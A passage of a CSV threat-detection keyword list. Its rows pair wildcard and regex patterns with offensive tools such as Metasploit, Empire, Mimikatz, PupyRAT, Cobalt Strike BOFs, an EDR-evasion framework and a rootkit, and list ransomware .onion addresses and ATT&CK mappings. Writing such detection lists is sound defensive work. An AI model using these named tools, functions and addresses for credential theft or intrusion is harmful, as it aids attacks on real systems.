TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","48408" "*import*autorecon.plugins*",".{0,1000}import.{0,1000}autorecon\.plugins.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","48409" "*import/nessus/*",".{0,1000}import\/nessus\/.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48410" "*import/nexpose*",".{0,1000}import\/nexpose.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48411" "*import_msf_web*",".{0,1000}import_msf_web.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","48412" "*ImportDll::GetAsyncKeyState*",".{0,1000}ImportDll\:\:GetAsyncKeyState.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48413" "*Import-DllImports -PEInfo *",".{0,1000}Import\-DllImports\s\-PEInfo\s.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - 
T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48414" "*Import-DllImports*",".{0,1000}Import\-DllImports.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black 
Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48415" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1105","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","48416" 
"*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 function name","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","48417" "*Import-DllInRemoteProcess*",".{0,1000}Import\-DllInRemoteProcess.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta 
- Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","48418" "*Importedx765ant Fileedx765s/Proedx765file*",".{0,1000}Importedx765ant\sFileedx765s\/Proedx765file.{0,1000}","offensive_tool_keyword","LummaC2-Stealer-sample","artifacts from a specific sample of lumma stealer - source code on github","T1204.002 - T1566.001 - T1059.003 - T1027 - T1140 - T1555.003 - T1557.001 - T1083 - T1560.001 - T1041 - T1567 - T1071.001 - T1105 - T1539","TA0006 - TA0010","Lumma Stealer","N/A","Credential Access","https://github.com/x86byte/LummaC2-Stealer","1","0","#content","can be used for yara scans","10","1","31","5","2025-02-18T00:38:59Z","2025-02-15T12:28:05Z","48419" "*Import-Module */PView.psm1*",".{0,1000}Import\-Module\s.{0,1000}\/PView\.psm1.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","48420" "*Import-Module *Microsoft.ActiveDirectory.Management.dll*",".{0,1000}Import\-Module\s.{0,1000}Microsoft\.ActiveDirectory\.Management\.dll.{0,1000}","offensive_tool_keyword","powershell","redteam technique - import the ActiveDirectory module without the need to install it on the current computer - the dll has been extracted from a Windows 10 x64 with RSAT installed","T1110.001 - T1110.003 - T1110.004","TA0006","N/A","N/A","Credential Access","https://github.com/mthcht/Purpleteam/blob/main/Simulation/Windows/ActiveDirectory/Bruteforce.ps1","1","0","N/A","N/A","N/A","2","184","19","2024-12-20T10:22:25Z","2022-12-05T12:40:02Z","48422" "*Import-Module DSInternals*",".{0,1000}Import\-Module\sDSInternals.{0,1000}","offensive_tool_keyword","DSInternals","Directory Services Internals (DSInternals) 
PowerShell Module and Framework - abused by attackers","T1003 - T1087 - T1018 - T1110 - T1558","TA0003 - TA0006 - TA0007","N/A","COZY BEAR","Discovery","https://github.com/MichaelGrafnetter/DSInternals","1","0","N/A","AD Enumeration","10","10","1760","265","2025-04-16T18:12:55Z","2015-12-25T13:23:05Z","48424" "*import-module psinject.ps1*",".{0,1000}import\-module\spsinject\.ps1.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","48425" "*Import-PhishWinLib*",".{0,1000}Import\-PhishWinLib.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - 
Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","48426" "*improsec/SharpEventPersist*",".{0,1000}improsec\/SharpEventPersist.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","1","N/A","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","48427" "*In medium integrity but user is a local administrator- UAC can be bypassed*",".{0,1000}In\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#content","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","48428" "*In medium integrity but user is a local administrator- UAC can be bypassed*",".{0,1000}In\smedium\sintegrity\sbut\suser\sis\sa\slocal\sadministrator\-\sUAC\scan\sbe\sbypassed.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. 
no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","0","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","48429" "*In memory of all those murdered in the Nova party massacre 7.10.2023*",".{0,1000}In\smemory\sof\sall\sthose\smurdered\sin\sthe\sNova\sparty\smassacre\s7\.10\.2023.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","N/A","N/A","10","3","242","40","2024-06-29T10:34:48Z","2023-10-19T07:54:39Z","48430" "*in.mirrors.cicku.me/blackarch/*/os/*",".{0,1000}in\.mirrors\.cicku\.me\/blackarch\/.{0,1000}\/os\/.{0,1000}","offensive_tool_keyword","blackarch","offensive distribution - url used by the OS for updates","T1071.001 - T1105","TA0009","N/A","N/A","Exploitation OS","https://github.com/BlackArch/blackarch","1","1","N/A","N/A","10","10","2969","595","2025-04-22T06:14:44Z","2012-08-16T16:03:43Z","48431" "*Inactive Domain Admins Honey Tokens*",".{0,1000}Inactive\sDomain\sAdmins\sHoney\sTokens.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","N/A","8","3","282","57","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z","48432" 
"*inbukcc4xk67uzbgkzufdqq3q3ikhwtebqxza5zlfbtzwm2g6usxidqd.onion*",".{0,1000}inbukcc4xk67uzbgkzufdqq3q3ikhwtebqxza5zlfbtzwm2g6usxidqd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48433" "*Incarnadine_devil@hotmail.com*",".{0,1000}Incarnadine_devil\@hotmail\.com.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#email","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","48435" "*incblog6qu4y4mm4zvw5nrmue6qbwtgjsxpw6b7ixzssu36tsajldoad.onion*",".{0,1000}incblog6qu4y4mm4zvw5nrmue6qbwtgjsxpw6b7ixzssu36tsajldoad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48436" "*incblog7vmuq7rktic73r4ha4j757m3ptym37tyvifzp2roedyyzzxid.onion*",".{0,1000}incblog7vmuq7rktic73r4ha4j757m3ptym37tyvifzp2roedyyzzxid\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","48437" "*inceptor*POWERSHELL*",".{0,1000}inceptor.{0,1000}POWERSHELL.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - 
T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48438" "*inceptor.py *",".{0,1000}inceptor\.py\s.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48439" "*inceptor/obfuscators*",".{0,1000}inceptor\/obfuscators.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48440" "*inceptor-main.zip*",".{0,1000}inceptor\-main\.zip.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","48441" "*include ""MSFRottenPotato.h""*",".{0,1000}include\s\""MSFRottenPotato\.h\"".{0,1000}","offensive_tool_keyword","ADCSCoercePotato","coercing machine authentication but specific for ADCS server","T1187","TA0006","N/A","N/A","Credential Access","https://github.com/decoder-it/ADCSCoercePotato","1","0","N/A","N/A","10","3","224","31","2024-05-05T14:42:23Z","2024-02-26T12:08:34Z","48442" "*include ""prefetch_leak.h""*",".{0,1000}include\s\""prefetch_leak\.h\"".{0,1000}","offensive_tool_keyword","prefetch-tool","Windows KASLR bypass using prefetch side-channel CVE-2024-21345 exploitation","T1564.007","TA0004","N/A","N/A","Privilege 
Escalation","https://github.com/exploits-forsale/prefetch-tool","1","0","N/A","N/A","8","1","90","10","2024-04-26T05:40:32Z","2024-04-26T05:00:27Z","48443" "*include ""ThrowbackDLL.h""*",".{0,1000}include\s\""ThrowbackDLL\.h\"".{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","48444" "*include *Nidhogg.hpp*",".{0,1000}include\s.{0,1000}Nidhogg\.hpp.{0,1000}","offensive_tool_keyword","Nidhogg","Nidhogg is an all-in-one simple to use rootkit for red teams.","T1055 - T1055.012 - T1574 - T1574.002 - T1056 - T1056.001 - T1027 - T1027.002 - T1112 - T1050 - T1106 - T1554 - T1554.002 - T1134 - T1134.001 - T1037 - T1037.001 - T1053 - T1053.005 - T1055.011 - T1098 - T1098.003 - T1070.001 - T1070.002 - T1070.003 - T1070.004 - T1070.006 - T1070.007 - T1070.008 - T1070.009 - T1083 - T1113 - T1113.001 - T1125 - T1125.001 - T1482 - T1489 - T1490 - T1497 - T1497.001 - T1497.002 - T1497.003 - T1498 - T1498.001 - T1498.002 - T1499 - T1499.001 - T1499.002 - T1499.003 - T1499.004 - T1499.005 - T1562 - T1562.001 - T1562.003 - T1562.004 - T1562.006 - T1562.007 - T1562.008 - T1562.009 - T1562.010 - T1562.011 - T1562.012","TA0005 - TA0003 - TA0004 - TA0006 - TA0009 - TA0040","N/A","Black Basta","Exploitation tool","https://github.com/Idov31/Nidhogg","1","0","N/A","N/A","10","10","1946","284","2025-04-19T14:28:47Z","2022-05-29T14:37:50Z","48445" "*include beacon.h*",".{0,1000}include\sbeacon\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","0","N/A","N/A","10","10","959","147","2025-02-26T21:21:25Z","2022-04-25T16:32:08Z","48446" "*include injection.c*",".{0,1000}include\sinjection\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike injection BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - 
